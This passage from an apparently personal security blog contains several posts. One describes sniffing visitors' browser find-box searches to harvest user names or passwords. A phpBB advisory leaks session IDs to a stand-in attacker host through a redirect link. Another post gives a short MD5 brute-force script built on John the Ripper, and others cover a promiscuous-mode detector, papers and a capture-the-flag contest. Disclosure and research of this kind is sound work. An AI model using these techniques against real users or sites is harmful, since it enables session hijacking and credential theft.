I know what you’re searching for…
Didn’t you always want to know what your visitors are searching? And I don’t mean searching like what he typed into google, but what term(s) they try to find on your website (e.g. using Ctrl-F).
The idea is pretty straightforward: If you are searching something on a site, your browser will highlight what you are searching for (at least the first hit). So it has to somehow fiddle with the representation of the page. The shadow DOM seems to be presenting itself as a target for this one. For those who have never heard of this I recommend Glazkov (2011). In short it is a way to create and modify elements hidden in the DOM; frequently used by browsers to draw complex items like media player controls. After some reading, trying to find out what the API might be, I stumbled upon document.getSelection(). I didn’t really thought this would work, but in fact it does. Well, at least in Firefox. In Chrome the user has close the search widget to make the searched term available. And in Opera it doesn’t work at all. So what do I mean by “it works”?
Firefox highlights the search result on the page and handles it as a selection. This enables the site to have a look at what you are typing in your search field. But this raises one drawback. The getSelection method only works if the searched term can really be found within the document.
To solve this, a pretty straight forward approach sprung to my mind. I could just generate dynamic content providing all possible next inputs. So I basically generate a base set of printable characters and wait for the user to start his search. Then, as he is typing, I continuously check what the user has typed and append a list of strings to the document using the user’s term and postfix it with every printable character. As long as this happens faster than he is typing and he types consecutively, not changing letters within the search term or at the beginning, it works. Such problems could be tackled by generating more letters in advance and also add them within the words. But the general users behaviour should be covered.
A very simple proof of concept can be found here.
You might wonder by now why this is interesting at all. We have stored all our data at social communities and google knows everything we search for anyhow. This brings me to how I initially got the idea to have a look at this. Once again I saw a tweet about a hacked site, that I am registered at and the leaked accounts were presented at some random pastebin page. So I went there and did what? Of course, I searched for my email address, user name or whatever information might indicate that my account information got leaked and is now accessible for everyone else.
In this scenario, all they can find out is that I am the owner of that account I searched for. No harm done, except some privacy issues if combined with some more snooping. But what if an attacker generates user IDs on the fly based on what the lured user types? Thereby gaining new information about the victim’s user name at site XY or his registered email address, depending what information is presented to him in the fake leak.
This could be taken even one step further. The site could only present numerical user ids and corresponding passwords. Done as a targeted attack this could reveal the user’s password granted that he is careless enough to type his password into a search field of his browser. But the inhibition threshold is probably much lower, because you type it into your own browser not a search function of some site or a search engine.
For those of you who really had a look at the demo, probably two questions/remarks arise.
First question is probably: Why are there 5 divs holding old selection predictions? That is caused by two factors. On the one hand more than one div is needed, because once the found search term gets replaced via JavaScript the selection will be an empty string. On the other hand fast typing will cause fast replacement of the divs and make them error prone, especially when deleting. Still there are some cases in which the script loses track, but the enhancements mentioned above should cure some.
Second remark would be that the generated text is not very carefully hidden. Well, first I thought about leaving it completely default text and therefore easier comprehensible what is going on. But then again I wanted to make it at least somewhat less obvious. Sure with CSS or IFrames or whatever is up your sleeves you can hide it completely from the potential victim.
By the way this also works with Pentadactyl in Firefox and Vimium in Chromium, when searching by “/”. This makes Chromium users using Vimium more susceptible to such an attack.
Popularity: 94% [?]
PromiFinder
I just started reading “Chained Exploits” recently and stumbled upon a quickly chipped in reference to PromiScan. This tool does something pretty interesting, which I’ve never heard of or read before.
In short it utilizes ARP request with the faked broadcast MAC address of ff:ff:ff:ff:ff:fe to discover network interfaces that are in promiscuous mode. That is possible, because as it turns out the network interface hardware correctly sorts out those requests. Whereas, if the interface is in promiscuous mode, the hardware forwards everything and the software (e.g. kernel driver) evaluates only a part of the MAC address until it concludes it is a broadcast address. I’ve read their paper,which I recommend to everyone interested in this topic and thought why not develop such a tool on myself for linux (as theirs is for windows).
Toying with this lead me to a little drawback of the approach. On linux WLAN seems to be implemented by using the interface as if in promiscuous mode. That leads to the result showing all WLAN interfaces of linux (I only tested with ubuntu) computers as promiscuous interfaces.
So for everyone who wants to know what exactly I did here is the source code. It currently checks for all your network interfaces and scans all subnets for promiscuous devices. In order to use this you need the python packages netifaces and scapy. To run the tool simply execute the following command as root or sudo it.
scapy -c promiFinder.py
Popularity: unranked [?]
phpBB Vulnerability: Login redirect SessionID leakage
Yesterday I informed the phpBB devolpers of a flaw I found, but they neglected this issue and told me that such vulnerabilites are unavoidable. Further they told me, that the session id on its own does not provide access, because there are some other parameters that get checked, like the User-Agent header and something they described as a “very similar IP”. I didn’t look into the implementation, so I don’t know what he meant, but this seems like some interesting implementation.
But lets not get too much into the detail before you know what this is all about. That is what I send to the phpBB security tracker:
I. Problem Description
It is possible for an attacker to gain the SessionID from a victim. The
attacker has to bring the victim to visit a link likehttp://www.phpBB-app.com/ucp.php?mode=login&redirect=http://mydoma.in/saveSID.
This will reset the hidden redirect input field on the resulting page to
“http://mydoma.in/saveSID”. If the victim now logs in he will be
redirected to this URL appended with the sid as GET parameter, which
looks like this on the attackers server:
—
GET /saveSID?sid=2d26f6b2f4fc7cf39d3d742e7ca4795e HTTP/1.1
Host: mydoma.in
[...]
—II. Impact
The leaked SessionID can be used to continue other users sessions and
therefore gaining control over their account.III. Solution
I would recommend to not allow redirects to foreign domains at all, as
it does not seem to make sense to me.
Lets get back to their objections. The first check, against the User-Agent header really does not provide any security at all, as the attacker only has to copy it from the request he received from the victim.
The second is much more tricky as is comparatively easy to forge an IP, but pretty hard to receive the response to such a request. Well, at least to my knowledge. As far as i could see they use nonces as a session riding prevention, so you need to have the nonce to do state-changing requests.
But nevertheless, I think the sid parameter should be tried as good as possible not to be leaked outside the domain. Maybe someone else knows how to exploit this or somewhen someone will find a way to do so.
Popularity: unranked [?]
MD5 Brute-Forcer
I just build a short md5 brute force script in python and want to share it, maybe there is someone else out there who might find this one interesting. It is based upon john, more precisely the incremental mode. This is because the stdout flag of john does not work in the default mode, for whatever reason. If someone knows, please tell me.
I wrote it because, today I had a lecture, wherein the lecturer challenged us to reverse a given md5. The usual databases did not lead to a hit, neither did some dictionary based attacks. So I decided to have john try it, but somehow I did not get him to recognize it as an md5. Weirdly md5sum calculated md5s wrong for me, therefore I decided to create a short python script.
import os import sys import md5 if len(sys.argv) == 2: d = sys.argv[1] o = os.popen('john -stdout -incremental') for l in o: if md5.new(l.strip()).hexdigest() == d: print l.strip() else: print 'usage is: ' + sys.argv[0] + ' <md5 hash>'
P.S.: If someone knows why md5sum created wrong output, please enlighten me. The shell command looked like echo "word" | md5sum .
Update (April 23rd 2008):
Today I have been told why the md5sum shell command did not work. It is, because echo ends every output with a new line. You have to use echo -n to stop this behaviour.
Update (May 6th 2008):
Yesterday I enhanced the script a little, so now it takes the hashes from a file and is also capable to brute force several hashes at the same time, which is the main cause for this enhancement. The hashes in the file can be separeted by all kind of whitespace characters recognized by split().
import os import sys import md5 import re if len(sys.argv) == 2: f = open(sys.argv[1]).read().split() d = {} for h in f: if not (len(h)==32 and re.search('^[0-9a-f]{32}$', h)): print 'Invalid hash has been removed:', h f.remove(h) else: d.update( { h : None } ) o = os.popen('john -stdout -incremental') for l in o: for h in d: if md5.new(l.strip()).hexdigest() == h: d[h] = l.strip() print 'Hash:', h, 'Clear:', l.strip() c = False for h in d: if not d[h]: c = True break if not c: for h in d: print h, '= "' + d[h] + '"' sys.exit(0) else: print 'usage is: ' + sys.argv[0] + ''
Popularity: unranked [?]
Bakkalaureatsarbeit
On monday I finished my Bakkalaureatsarbeit. Its somewhat like a bachelor. So I only have to take some more exams, that I even though need for my diploma and then I am allowed to put a BSc in front of my name \begin{proudness} · · · \end{proudness}.
It deals with the subject of making web application vulnerability scanners more effective. We started developing a web application scanner nearly a year ago as a project from the university, on which this elaboration bases. There are some pretty new approaches build in the scanner that are, as far as I know, completely new in web application scanning software developed so far. I am working on this project with Daniel Kreischer, with whom I also wrote the Bakkalaureatsarbeit, and Martin Johns, who supervised the project and paper and gave us many hints, ideas and inspirations.
The scanner itself is not yet ready for release, since it is still under heavy construction to implement all the described features and ideas, but it is supposed to be in the near future. We already tried to hold a talk at the 24C3 last year about this project in an earlier state, but were rejected (at least in the last round as we heard).
If you are interested in this topic or just curious, here is the link to the paper “Bakkalaureatsarbeit: Similarity Examinations of Webpages and Complexity Reduction in Web Application Scanners”. Well it spans over 60 pages so its a little bit more than a usual paper, but if you are already familiar with the web itself and web application security you can certainly skip the first part.
If you are having ideas, concerns or any kind of suggestion, please share it with us.
Popularity: unranked [?]
Implementation Vulnerabilities and Detection Paper
I totally forgot to put this one online. It is already half a year old and was the result of a seminar that took place in the winter term 2006/2007.
It discusses both web-application vulnerabilities, like XSS, CSRF, SQL injection and the like, and classical ones, like buffer overflows, format strings and dangling pointer references. Each Vulnerability gets first explained and afterwards we describe protection mechanisms and possible problems about them.
There is only one major drawback, that is, the paper is in German, so you are possibly not able to read. But take this as your chance to learn it. ;)
Popularity: unranked [?]
CIPHER 3 (aka germany - country of hackers)
It has been a while since I made my last posting, but i hope i can add some content again in the near future.
On thursday, 12.07.2007, the CIPHER 3 took place and we as the CInsects participated in it. For those under you, who doesn’t know what this is finds here a little summary what a CTF is. I had more or less voluntarily agreed to set up our infrastructure, but, as it is in live, hadn’t as much time as I thought I would have. So partly therefore and partly because we always seem to start a little confused we started pretty slow and ranged in the last few places. But as the end got closer we slowly made it more towards the top. In the finish spurt we wrote some obviously pretty good advisories, which brought us to the lead in the advisory section and aggrandised us to the 4th position in the end. We were really excited about this result, since nobody bargained for such a good place after our mulled start.
The results and some statistics will be available next week on the CIPHER 3 homepage. Very interesting is the fact, that the first 6 teams are from Germany. So Germany seems to be getting the country of hackers … erm … I mean security experts ;). Well, possibly it this is only, because it is organized and held by a german team. Here is the final scoreboard. If you are interested in which team is from where and representing whom just compare the numbers with those on the CIPHER 3 homepage.
I want to thank here again Lexi and his crew for making such a cool event possible, taking all the time it needs to prepare it and keeping calm if the players complain when something doesn’t work the way wanted. Naturally I would thank all the other participants too. It was a great game and I hope everyone enjoyed it as much as we did. :)
Update: Stats are available here.
Popularity: unranked [?]